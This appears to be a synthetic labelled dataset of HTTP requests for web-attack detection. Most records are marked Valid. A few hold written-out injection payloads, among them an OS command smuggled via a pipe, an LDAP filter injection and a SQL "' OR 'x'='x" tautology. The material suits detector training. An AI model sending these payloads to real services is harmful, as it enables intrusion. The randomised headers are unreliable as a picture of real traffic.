TE: gzip,chunked,chunked
Trailer: Transfer-Encoding
User-Agent: aah7dLLtcecN3ikWLneg
UA-CPU: 68000
UA-Disp: 587,522,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 405x937
Via: HTTP/6.3 www.7deihph.html:04
Transfer-Encoding: compress
Upgrade: cweSe/4.5, 2wd0e/5.6, Ttl/1.4
Warning: 591 www.2iae.css "moahvhy6y9oI" "Fri, 27 Jul 07 17:55:14 GMT"
X-Forwarded-For: 26.164.27.111
X-Serial-Number: 39502
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28824
Start - Id: 28637
class: Valid
GET /eW2/6L9T44C/eZY5nN22ze/rrsiedxee43etw9hj/EiealnTodniseOiZso/tP0xi/OhZicNlk-V2xp_Wnph-C.html? HTTP/1.1
Host: 29.217.128.1:263
Connection: keep-alive
Accept: audio/*;q=0.9, audio/x-wav;q=0.8
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.0
Accept-Language: 1apn-tzfpuo, uTta-Sgeus;q=0.2
Cache-Control: no-cache
Client-ip: 244.119.213.222
Cookie: m4H5=set;stD0=5Ps-2ddMj3y;wEsvmeay=966529990;neveadwwhoa6=iE)asaTehm
Cookie2: $Version="335"
Date: Thu, 07 Sep 06 04:19:00 UTC
ETag: "p4ZowzqOkri_rJ-VG0"
Expect: uApvrb
From: 6EaEszit@irni.st
If-Modified-Since: Mon, 16 Aug 04 21:27:57 CET
If-Unmodified-Since: Mon, 22 Mar 10 07:49:49 GMT
If-Match: *
If-None-Match: "XC_EJ73I8t7K3C3"
If-Range: *
Max-Forwards: 687
MIME-Version: 4.0
Pragma: hz4tid=9nst
Proxy-Authorization: Basic cnRtYjppTW9naDVz
Authorization: Digest nc=8d1ecaa2
Range: -5208,9131-01794,317-32381
Referer: /drsehprm/lxLlOr/isltods/UuhI.cgi
TE: trailers,chunked;q=0.8
Trailer: Referer
User-Agent: mAa8m (erE4ZVGPlV; eLXz7oZ; eeDgm3_3a; mtkDq9sp; ag8eSE.u)
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 680x3732
Via: 8.0 247.196.118.135
Transfer-Encoding: compress
Upgrade: Wtis/2.1, nat7E3/0.0, faaei/4.9, oas/2.1, fFtihs/4.5
Warning: 237 82.155.203.240 "uJnacosoyeo2" "Sun, 06 Sep 09 21:18:22 GMT"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6114886940251
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28637
Start - Id: 4826
class: Valid
PUT /roPhhT06EjzeOTOMny@Y/xieos8awisoae60/iJNtM1G7MW1execT1/it@e9b0j-v-Y3R_Wz0Tf.jpg? HTTP/1.1
Content-Length: 129
Content-Language: itrpxw,aqe,eolmen0T
Content-Encoding: gzip
Content-Location: /wkol/idbif1ha/smlnl5ce/brwt6/acstndLr.ace
Content-MD5: MHNjcm5zc2FySnNybGdpbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Mar 05 15:22:16 GMT
Last-Modified: Mon, 24 Sep 07 23:07:31 UTC
Host: 243.156.85.174:80
Connection: close
Accept: application/postscript, video/quicktime, image/*
Accept-Charset: iso-8859-8, iso-8859-7;q=0.0
Accept-Encoding: 
Accept-Language: cq-E, eTprrt-4;q=0.1, ttanoDch-dit, LTbo-si;q=0.2
Cache-Control: only-if-cached
Client-ip: 64.46.122.164
Cookie: u8eTqne=r;sA=access_log/[h;sskqot3ftn=0Lb.PSkhspK;hHe1Yw=pFQKR_w
Cookie2: $Version="1"
Date: Sun, 30 Apr 06 07:17:33 UTC
ETag: "_.Wi-eBBGDIz1mEb8R"
Expect: ooeanLi=w31yca;ekcitth
From: leaTmHa@pheie.net
If-Modified-Since: Sun, 14 Oct 07 08:20:10 CET
If-Unmodified-Since: Sun, 28 Mar 10 13:28:55 GMT
If-Match: "7VsV9xF01xuLsOhSL6IT"
If-None-Match: *
If-Range: "9xP9NHCgcPASeOkC0Y"
Max-Forwards: 513
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM dGVyZHFuRXNSYWVlZ2Voa3VoY3Vtd2JkOGVlZTd5ZWV5bg==
Authorization: NTLM aTVzZ2xyb1NiZWNwbmxwb05kb2luMmhhcDdleGdhaDRpaGFscmE=
Range: 9-855894,-389480,31399-5847
Referer: /deh922t/355eAern/eEo4/dehzhrP/tahtt.asp
TE: trailers,gzip;q=0.7,deflate
Trailer: From
User-Agent: wtne/7.9.8.7
UA-CPU: 68000
UA-Disp: 0621,287,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9174x0420
Via: 7.2 www.ijetI.jpeg:0
Transfer-Encoding: deflate
Upgrade: pltw/8.5, i0og/2.1, mto/5.0, khh/6.6, 54e/7.6
Warning: 256 www.esor2sne.html "tuocRrfoedT9hanfoqeo" "Sat, 03 Feb 07 19:15:16 UTC"
X-Forwarded-For: 92.118.218.21
X-Serial-Number: 408211072514512
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

Hg8EsLu=lzcdCk&uv=cCircpsiorperl tmpstti&s7jO3wwlhs=3a1aetorr&crasraZhohnnge5=5&@PnW=234075131&eTh3ust7n=nd https0dnonsi=&8w=2 

End - Id: 4826
Start - Id: 20569
class: Valid
GET /1group byxmlfjyUH/en4oytx4bt5mdpo/iiUUGjMib3ErYpgPI/enpl6egsajao0fhoeomg/rteg/5aaonofOtwaeNda/i5TLxj.I8H/qlId3ku/aKMB249AF2syuzDcnqm@/hc/ttGnq9lspcekmrkl.css?wporloelt=norinputconnecteee5eaN&r8sxioty=nRR6zG3dklq.&y7eM=3 HTTP/1.0
Host: 175.229.173.84
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-cyrillic, koi8-r, iso-8859-3, koi8, x-mac-greek;q=0.6
Accept-Encoding: *
Accept-Language: k-urnllori;q=0.0
Cache-Control: no-store
Client-ip: 231.122.134.222
Cookie: j2li3watmrevy=6807497;Er7ermsak=cti
Cookie2: $Version="407"
Date: Thu, 25 May 06 07:02:50 UTC
ETag: "noNH.XI2YLHZorj"
Expect: ruigm0oi=yotntt;wytfaT=Fef6e
From: po0uCr@azOlx3ayBy.org
If-Modified-Since: Wed, 07 Jun 06 05:59:40 UTC
If-Unmodified-Since: Mon, 03 May 04 06:14:41 CET
If-Match: *
If-None-Match: "y9XN-SYCDDxashzs"
If-Range: Fri, 26 May 06 07:19:48 CET
Max-Forwards: 01
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic bjlrdW9lOmF0ZWc=
Authorization: Basic MXN1ZWh0OnJ4cmVl
Range: 852875-5353
Referer: /0nsttEp/ot9i/t8ziptfb.fgf
TE: deflate;q=0.2
Trailer: Host
User-Agent: pEosbuncN7dt
UA-CPU: StrongARM
UA-Disp: 9823,4223,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7369x544
Via: HTTP/6.6 www.eepns.png, FTP/6.3 231.219.78.100, afen/5.8 www.0bnSa1h.js
Transfer-Encoding: compress
Upgrade: oenMr/2.7, dlt8/0.7, qsRuu/2.7, keAsp/4.8
Warning: 257 13.243.249.249 "3a9dtgni" 
X-Forwarded-For: 46.60.122.53
X-Serial-Number: 6248671751419598
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20569
Start - Id: 28433
class: Valid
GET /ol/2VD1wHwWftpN/axeD/yen8iibrnl/spqhsae/0K/eOYestiEuygtms.shtml?te59a=ns%27jl&elcureiuglme8ed=c5usr31rnooa%3C+%26&erinawIal=sCwFlL&seanosnehaOnad=465646317&guMa31openjF=3960638&mt5rhco=ih&soute3n=34941686&hsis=o%27%3Dib HTTP/1.1
Host: www.ttrh.uk
Connection: keep-alive
Accept: text/*;q=0.9
Accept-Charset: iso-8859-1;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 45.193.13.12
Cookie: cylouL7h=between]qo ttt  ranhtpassrO&e ;Abt=19;seasg=0428877554;kQlLcumnzpr1=str
Cookie2: $Version="1"
Date: Sun, 10 Jan 10 03:35:57 CET
ETag: "0TNONsD1PZ41Clf1@c"
Expect: ltNCi8=u3ts
From: oBcae9t@txO3eond.biz
If-Modified-Since: Sun, 16 Dec 07 01:32:50 UTC
If-Unmodified-Since: Thu, 08 May 08 07:36:06 UTC
If-Match: "kQ3x3YnBza8ocsD"
If-None-Match: "Vf9rz3fgwjot.tHNmii"
If-Range: "8lelqa@6lZ7DKC146WD"
Max-Forwards: 410
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: lewce SsheN=temsyl
Authorization: oibrl aaoH=eeyon
Range: 840682-12
Referer: /vrdI.conf
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/4.6 (Machintosh; U; Mac OS X 2.8; gh-zO; rv:0.1.8) Gecko/01058990
UA-CPU: 68000
UA-Disp: 7568,4542,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3420x5548
Via: FTP/5.3 125.241.125.244:195
Transfer-Encoding: ellnmt
Upgrade: 7t3eo/4.1, aetae/9.1, fEe/9.1, shiotn/1.3, jNe/2.0
Warning: 767 www.EeowrQT.jpg "t1heot" 
X-Forwarded-For: 34.125.43.206
X-Serial-Number: 15983235
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28433
Start - Id: 1748
class: Valid
GET /5s/UNMYLUu/7N/Uy2PRHAmeDy/5Psfin/leW/teurtNemetcu64eaMN8/edojnevcvyyooS/go5iledsane/QFg5JYG.jpeg?trSiaue=7cDtecmxrrhaihrcte&WbodyzQ58.Y=1723268&nicahiYoemc=24329&itpp=eOghaving&oaoihr=152&rcpzJvv=62&7erK=3tthmenpFbgsound HTTP/1.0
Host: 16.25.50.215:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 68.102.193.74
Cookie: osemh=n4h;kIoBbT@4=0u;hn29sdsca=8;7NabinRgmBN9W=5637;Rn=78;et=433213407
Cookie2: $Version="3"
Date: Tue, 20 Jan 09 16:19:20 UTC
ETag: "F5NI49YY7B98KOY@WC"
Expect: 100-continue
From: Yhidhbtu@eacennne.it
If-Modified-Since: Sun, 06 Mar 05 22:19:19 CET
If-Unmodified-Since: Mon, 23 May 05 01:58:52 CET
If-Match: "MSmVemY7Gi9izmmf"
If-None-Match: "-QuP8tEpItvIHvDIYXBk"
If-Range: Fri, 17 Sep 04 10:55:11 GMT
Max-Forwards: 3985
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic ZXFlbmVuZTp6bDdib2k=
Authorization: Digest nc=DF039fDb
Referer: http://www.nohtw4mv.com/tsenmo1/top4ge54/Twore/fiirx/ruri.rar
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: 5sengc/6.8
Via: HTTP/1.8 244.249.109.14
Transfer-Encoding: identity
Upgrade: hia/5.5, wcah/5.6, okoits/0.3, sP93/6.2
Warning: 665 www.ro7ndPBE.shtml "hwovsoawLo2rSjo5o1" "Mon, 24 Jul 06 19:41:19 GMT"
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1748
Start - Id: 43967
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.1
Host: www.3rlacn.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: al-znhal1ee, d-f;q=0.7
Cache-Control: max-age=5073
Client-ip: 112.139.123.3
Cookie: eArsu=407;TA@rE=Sayeghniro8ge
Cookie2: $Version="45"
Date: Fri, 21 May 04 09:21:36 UTC
ETag: "d0_qiYUs1JJWIAlbJB6"
Expect: naaaaho=iektd;i12sv
From: axenii@lMdner.de
If-Modified-Since: Sat, 20 May 06 19:30:11 CET
If-Unmodified-Since: Fri, 20 Feb 04 04:23:12 UTC
If-Match: "-p2rLxjVRyesjAFX.Q"
If-None-Match: *
If-Range: Fri, 04 Mar 05 16:36:47 UTC
Max-Forwards: 0
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest nc=E191EEa9
Authorization: NTLM VHVNYWVyN3Rzbml0d2lzcnBybGFqZXZsdm8wbGdkaWM=
Range: 2873-08
Referer: http://www.H2M3ii.be/oynubee/cfesetn.css
TE: trailers,trailers
Trailer: Referer
User-Agent: nbct0a
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2346x026
Via: 7.9 35.81.119.170
Transfer-Encoding: identity
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 185 www.ayfae.tiff:7 "h2dyo3oifn2sa9H7" 
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43967
Start - Id: 19333
class: Valid
GET /nQJejKXxW@22W/mj3YYy3W-KaKwj5F2C5j.html? HTTP/1.0
Host: 65.114.252.142
Connection: feyots
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: tta-rcezau;q=0.9, fnbeets-tsedert;q=0.2
Cache-Control: only-if-cached
Client-ip: 33.79.28.5
Cookie: s2cygseayehine=stsx9a9;Rieo=3o$f<crottke:b;hwacjh=03;hc=ePpA;or=3980390
Cookie2: $Version="47"
Date: Wed, 18 Oct 06 20:35:47 GMT
ETag: "yM.b@PPpJOVPMPCQ"
Expect: totcoe=xvtohed
From: Zda4pbA@utsheoe.biz
If-Modified-Since: Sun, 24 Jul 05 01:58:38 GMT
If-Unmodified-Since: Fri, 13 Apr 07 07:53:34 GMT
If-Match: "ThG@WfzvV4YSDO3nnrat"
If-None-Match: "YCQnuaTPpbMwku9Gh"
If-Range: Tue, 16 May 06 20:45:17 GMT
Max-Forwards: 99
MIME-Version: 7.6
Pragma: emEisr='o81stsL'
Proxy-Authorization: O3ejtj e7vaiske=itMt
Authorization: Digest cnonce="eewh"
Range: 0-6218,62-,-50681
Referer: /emi5ium/e4ndiH/eIcvyi/fooe.jpg
TE: deflate;q=0.5,gzip
Trailer: From
User-Agent: esiwnaMte (eQq63IkxhS)
UA-CPU: StrongARM
UA-Disp: 589,2791,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 352x2255
Via: 4.0 114.22.184.23
Transfer-Encoding: ehim
Upgrade: mt1/2.2, et8/1.8, iIcNti/6.4, teilcd/0.2
Warning: 315 www.aiaadlt1.jpg "plcnzht0hemeetsf" "Mon, 26 Mar 07 08:06:24 GMT"
X-Forwarded-For: 83.53.98.240
X-Serial-Number: 0947873125180577061
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19333
Start - Id: 585
class: Valid
GET /3p62/ls4Pn4ri8a/V7vPfF3scriptc6/bE/cE6ITjq1KAgOAEoA/0P.msf?-i3t35=04284&tN5PAua=hEst%28&dauaEc3ritd7hy=1339&9atarptyrn=tr&4OxUy0ku=0854560&ejYam9cmo=+nfto++&7saue=%24tot HTTP/1.1
Host: 209.153.87.224
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: efg-heuwtwo;q=0.8, etdcre-7henr, e-age;q=0.6, nrn-hctrxeee;q=0.3
Cache-Control: no-cache
Client-ip: 36.96.211.242
Cookie: tSrCt2swltD=dE0fsowhere;oxeejnpdOttl=687;7tXcMVMUAfRX=l9iddtgv;bn7=L@
Cookie2: $Version="478"
Date: Sat, 23 Apr 05 14:20:43 GMT
ETag: W/"p@mPy5FDSdHaWyzW8@Bd"
Expect: dyntwLi
From: i7wh@s1dUih1sA.it
If-Modified-Since: Mon, 19 Apr 04 17:23:45 GMT
If-Unmodified-Since: Sun, 19 Nov 06 24:04:47 UTC
If-Match: "j_KlXEmzc.2CvjlZl2"
If-None-Match: "8256VsKU0bykmfAiO1rT"
If-Range: Sun, 06 Jan 08 19:02:43 GMT
Max-Forwards: 4528
MIME-Version: 4.0
Pragma: NhCnoess='9l'
Proxy-Authorization: Digest uri=/enctRmn/arosaun.bin
Authorization: NTLM a3VjeG8waXNyUmY0dDVzZ3J1bkdkbHRpdHVzaVJjbmZpbA==
Range: 00-
Referer: http://6ott9z.com/LlrveA/edpcd81/indv8e.js
TE: chunked;q=0.9,trailers
Trailer: Host
User-Agent: itvgtloQ (4dKAZD2)
UA-CPU: Sparc
UA-Disp: 8563,166,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 412x961
Via: 4.4 31.171.214.201, 5.8 141.165.186.109:0, fgqoi/1.9 www.OsngHo.css
Transfer-Encoding: Dol4; wLEeeqz=2atizu0u
Upgrade: t4y/4.6, bIh/8.9, mS4e/0.2
Warning: 295 www.ensg.png "bmssbEen" 
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 812808464
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 585
Start - Id: 13389
class: Valid
GET /eo6l/iu5MjYZjwejFsZ6o/oobl8batnsfNd/hsycEaahmedmllhAfrm/a-jCgYXjTYzd/nK@B-BFHYR-wQC5Xi/n3WWgv/i1OptiA@_ZkZbR3/hSfohaen.html?n0n=p&Ercmiiwil=odE&i85TW2v8=338559&eerEgarnlrigy8e=uh4rre&e4lzK=ol1f%2Fh%2FDoo&duseis4saidpcd=erMT&trquir1=rlyeQilshgAt&uwoyLmm4=avscripteO&dpsYquACh=Na++%7E&nhepe=s1O2ZJfsf4&seetusi6eY=4BWo&ycR69ec4=di%29%3ElvhtaccesA3e&rld=Nias%28 HTTP/1.1
Host: www.in1rr.ch:2810
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: 1u-Rou;q=0.6, klseu-mcaene;q=0.3, te4-edtjdeoi, ddIeUu-6cao;q=0.6, grna-kpitachd;q=0.3
Cache-Control: l1e=wxidftfo
Client-ip: 32.196.73.191
Cookie: 0TkJJT-enY1s=2457185;htoenrgcs1Sv=642647961
Cookie2: $Version="49"
Date: Wed, 02 May 07 19:30:02 CET
ETag: W/"ibY9XxFmQ1Vh._w_jD8W"
Expect: 100-continue
From: tR8tllhl@cnlly.de
If-Modified-Since: Sun, 20 Jul 08 11:47:35 CET
If-Unmodified-Since: Wed, 14 Oct 09 07:48:05 CET
If-Match: "fv5@I_7E1_T0kEEorL"
If-None-Match: *
If-Range: "LRVs8oOJ3Evqd741xU"
Max-Forwards: 85
MIME-Version: 5.9
Pragma: i=enefuot
Proxy-Authorization: NTLM aWZyUnN1dGVXZ2VuZWlOZUFubnJlbzF3Yk5yYWlvOW9UdWk3dHN0RWZsYQ==
Authorization: Basic ZWVzbnZsZG46bmlsZA==
Range: -95
Referer: http://www.dd2T.biz/6aa5oeA/scoto.sh
TE: gzip,chunked;q=0.9,trailers
Trailer: Connection
User-Agent: Mozilla/5.7 (compatible; MSIE 9.1; SunOS sun4u; t1meAer)
UA-CPU: x86
UA-Disp: 6806,3540,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 968x9217
Via: FTP/6.6 198.172.176.73, 9.9 www.it6id.shtml:590, 1.5 www.0bs2qgc.css
Transfer-Encoding: gzip
Upgrade: tNatdt/7.8, 7ear/6.7, nTyilu/3.1, oyem/6.0
Warning: 246 159.73.154.161 "purtdea5Lon" "Sat, 12 Mar 05 05:48:54 UTC"
X-Forwarded-For: 245.210.86.17
X-Serial-Number: 0029155789665263
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13389
Start - Id: 37169
class: LdapInjection
GET /w2x/iI64OAM-v/neeuenestec5asdyfi/ekB/irrm7yihad.jpeg?rfaiinbgnughsa4=9eeenuxatuot0eoie&vhdcce=53456&8GGt5bjLH=ete37%3A07h&yNe5i0ude=0734708&oese=rdia&ud0m=m%40zAnXKWp&arr=aidhos%3Cp&Ed7=erettplRee&Yx1s@3uR.q=aS5_YY&ce9nrn6Aifn=var6ei&98diat0nnsarHd=%29+++%28%7C%28displayName%3Dhad*%29%28name%3D+had*%29%28++++mail%3Dhad*%29&Sssobalyhcn=62&hcn=09103&oxu5fNzstNeiah=730&ums99ldLm=hkV HTTP/1.1
Host: 122.176.225.242
Connection: close
Accept: image/png
Accept-Charset: *
Accept-Encoding: compress;q=0.7, identity;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 188.238.110.194
Cookie: dNf5CwsamJr=49036;hm0r=d5wFf;_Ngzd04LtD=708727;aL6N=em?;aeReivf1iotdw9e=2245326;eiseaspvit=admin2o nu bmailtcr>ee-~rsg
Cookie2: $Version="45"
Date: Sun, 31 Jul 05 08:08:46 UTC
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: eGqmep=9at5aun;pdiah=wrena
From: leAt4Eeo@dfiwc.org
If-Modified-Since: Fri, 24 Jul 09 22:57:41 GMT
If-Unmodified-Since: Thu, 15 Apr 04 10:33:41 CET
If-Match: "ZZ_Hb9SincDFlrTDUc0"
If-None-Match: *
If-Range: Sun, 07 May 06 17:45:03 UTC
Max-Forwards: 315
MIME-Version: 3.6
Pragma: sr='h'
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Digest nonce
Range: 183458-,10781-99705
Referer: /igks.png
TE: trailers
Trailer: Via
User-Agent: nUJNRwUp http://www.dtiU6.org
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5776x2501
Via: FTP/0.9 www.uwlKnn.js, 0.6 166.59.1.110
Transfer-Encoding: deflate
Upgrade: Tri/4.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 6743183535814854929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37169
Start - Id: 21839
class: Valid
GET /mcaalmueiaEutmwdhmr/chewozfgtseatODah/d4wVkE@Uh5gRA8-KKZ/WpassthruONs_ZIc@AD7YB/x0InQsnHcpNNSH/2vlQ6poLu/ePSQ/Ctohsl1/ksyhdhz.gif?lerrR=o4J3e4fnv8tN&X-dJdM00d_=oZkTAK6op-W&bzs3eic2ho9Et=1388726&kpesaseeh=etc%7E&nbetweenUcC4=athscripthtpassol&auoR=o6jhm&td=ueeahEh2nWicwinntj&oecpvy=87250854&Subhe=sHnxqP&mepearsyw=cinwtfLtdfio2i&%u_Yxw0OQNexecV=ilreeea5abtyBa&RpMUconnect4W=hLv9-_cG_ HTTP/1.1
Host: 56.244.8.236:80
Connection: gsna
Accept: */*
Accept-Charset: x-mac-ce, cp-950;q=0.2, iso-8859-2;q=0.3, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: eevcaa-reoplc, e4cb-erEvw;q=0.7
Cache-Control: min-fresh=0
Client-ip: 254.135.226.163
Cookie: 6Qfx8Z=9TGFHK68u;podlydisadnsIte=12406148;fnoiaa3tmo=6snactE;Myy0bs1ea80=itinclude4;rnYsetsqre=winntd(&yuinputec|w2
Cookie2: $Version="387"
Date: Sat, 04 Jul 09 16:25:44 CET
ETag: "nKqVikWhRsnFSJJpA18C"
Expect: sLi9lbS
From: aiahtri8@rnlaavmnt.be
If-Modified-Since: Wed, 26 Dec 07 02:46:59 CET
If-Unmodified-Since: Tue, 03 Feb 09 05:32:00 CET
If-Match: "9.x.zOyv4BqmBtpNK"
If-None-Match: "MzUucyHpdwa22Ru"
If-Range: Sun, 17 Apr 05 02:54:14 GMT
Max-Forwards: 6961
MIME-Version: 0.6
Pragma: eeumegd='Ixueny'
Proxy-Authorization: Digest response="D5B0a7D66ce9CaDc9B7fbC4bBDdCb0cC"
Authorization: NTLM ZWd0c21lc3hlcWlkc3FFaWhndXdzYWJhZWVhb2xlc2FmcHRjc210eDZ0bmV0aGU=
Range: 24-5050
Referer: /inah/IadT/mlHiI/nHIr/ascnHln.jpg
TE: gzip,trailers,deflate
Trailer: If-Modified-Since
User-Agent: Rtidlefe (hCxGH6v)
UA-CPU: x86
UA-Disp: 488,0035,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3901x4660
Via: FTP/5.3 www.cDlppdRe.html, HTTP/9.5 www.t2sAe.jpeg:90730
Transfer-Encoding: gzip
Upgrade: rhorei/6.8, eO4/0.9, dtoA/9.0
Warning: 721 www.daoejbee.jpg:03056 "gyndpceaorfoaes" "Thu, 02 Jul 09 06:04:20 UTC"
X-Forwarded-For: 113.55.233.173
X-Serial-Number: 202474
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 21839
Start - Id: 14496
class: Valid
GET /os0d/dFd5bgsoundoM.bin?0fpLfirOts6ttab=seTlRfSyEd0l&clraqrcrr4qe=tiwr&eSf=nncnbmy%26sapositionni+h&scedmyooeacR1s=ihiO6hneb%3Fiee&d3xO4=4305358&ftf5dfaurtj=zefht&XG4am6=oz%40no&ed9nglts=795786 HTTP/1.1
Host: www.1nte.net
Connection: shrllop
Accept: audio/x-wav;q=0.8, image/png
Accept-Charset: *;q=0.6
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 156.195.173.2
Cookie: rshhl=5947106;feM9sytauhuk=ta1
Cookie2: $Version="60"
Date: Sun, 31 Aug 08 08:40:41 UTC
ETag: W/"ugECzM6iUuVZB3pqMlr"
Expect: ulijiif
From: nhsko@onEumg.net
If-Modified-Since: Fri, 23 Apr 10 09:59:48 UTC
If-Unmodified-Since: Mon, 29 Jan 07 20:54:18 CET
If-Match: *
If-None-Match: "dlDQheQzIuhqwwabaBo"
If-Range: *
Max-Forwards: 88
MIME-Version: 5.2
Pragma: StGed='4mar'
Proxy-Authorization: Digest cnonce="2tl6"
Authorization: n0mr 3Ethitaq=yejS
Range: 737195-
Referer: http://www.htwvb.st/otmc.exe
TE: chunked;q=0.6
Trailer: Warning
User-Agent: Mozilla/8.8 (X11; U; Open BSD i386 9.3; on-oi; rv:4.0.4) Gecko/17862254
UA-CPU: StrongARM
UA-Disp: 866,9515,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2304x0310
Via: 2.0 www.hamk.shtml:9870
Transfer-Encoding: identity
Upgrade: aha/1.7, himts/1.6, uNp/7.6, Grw/1.1, Etd/1.9
Warning: 242 174.80.186.170:3881 "srhnvra8" 
X-Forwarded-For: 33.83.28.62
X-Serial-Number: 58967727839058915929
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14496
Start - Id: 42153
class: SqlInjection
GET /om/m3fzuq_JvoDFU.C/@hhtpass./oswosAeLtovt/nMleYdi@xAk7M.jpeg?%uFCusr=ci3a&54bTtteIqibitm=od6nQv6&d7Mpeerei=622677&oh8Eoqwnpl=n+&nocisR=nhtselfkastmpslftppdo%3C&E4CE.m5J=E&JXrEYBE1=slDap&eshueoo=7891738&P0JYlcio=epe&71stcm=f7sunB&fvyqrti=%27+OR++%27h3sldxllzhE%27%3D%27&irh=511712385&RZFP..E0dI6=22&ohie=0554900015 HTTP/1.1
Host: www.zesno1.uk
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1251;q=0.2, iso-8859-8-i, cp-936, x-mac-arabic;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=903
Client-ip: 117.221.83.105
Cookie: eecirujoAdtfle=a
Cookie2: $Version="6"
Date: Wed, 15 Sep 04 10:10:23 UTC
ETag: W/"q9@-@42oTbHORdulE04"
Expect: 2tic
From: aEae@nmulCfnife.com
If-Modified-Since: Sun, 29 Jun 08 05:21:08 UTC
If-Unmodified-Since: Mon, 28 Aug 06 18:14:01 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 19
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest realm
Range: 4781-
Referer: /Rfl0iu/nwme/8vaf5o/er1iorhr.aspx
TE: deflate,trailers
Trailer: Expect
User-Agent: Mozilla/5.5 (X11; U; Solaris 2.2; dz-ch; rv:1.3.5) Gecko/50181384
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3499x504
Via: 4.5 www.homphXe.html, HTTP/5.2 www.oanEato.htm:7
Transfer-Encoding: ktfi
Upgrade: cosqd/4.3
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42153
Start - Id: 48353
class: XPathInjection
GET /fdaalhToena4Weoaeimy/e8IPi/ayJvN3eqzdYL/hxih9ippnwxof7n82/ant5sA/8JQbetweenfV2B.msf?fdriekfstk7t=vheyeltiyle8&sejo0ve6heTiWf=Rtpao&areeuthsselasm=Ar0ftpa&L@tDS3=qwp-ntisv&ug=63&9elhotlsIiMehi=gWJL&rsRlMew=65418&ljiabboahrbw=aawVGVIQ67h&eshos=%3Fd%24s HTTP/1.1
Host: 195.77.188.46:80
Connection: 0rpn8ri
Accept: */*;q=0.1
Accept-Charset: x-mac-chinesetrad, iso-8859-7;q=0.0, x-mac-ce
Accept-Encoding: 
